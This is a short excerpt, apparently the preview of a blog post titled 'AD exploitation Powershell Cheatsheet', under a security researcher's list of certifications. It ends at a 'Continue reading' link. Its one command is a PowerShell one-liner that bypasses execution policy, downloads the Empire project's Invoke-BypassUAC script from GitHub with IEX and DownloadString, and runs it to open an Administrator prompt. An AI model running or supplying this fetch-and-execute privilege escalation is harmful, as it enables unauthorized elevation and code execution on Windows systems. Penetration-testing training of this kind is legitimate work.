Author: Mr X

Security Researcher | CISSP| OSCE3 | CISA | CIPM | GCPN | GPEN | OSCP | LPTM | GCFA | GICSP | GCIH | ECIR | EWPTXv2 | EMAPTv2 | ECTHPv2 | CRTO |

AD exploitation Powershell Cheatsheet

Cheatsheet:- # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] powershell.exe -exec bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1’);Invoke-BypassUAC -Command ‘startContinue readingAD exploitation Powershell Cheatsheet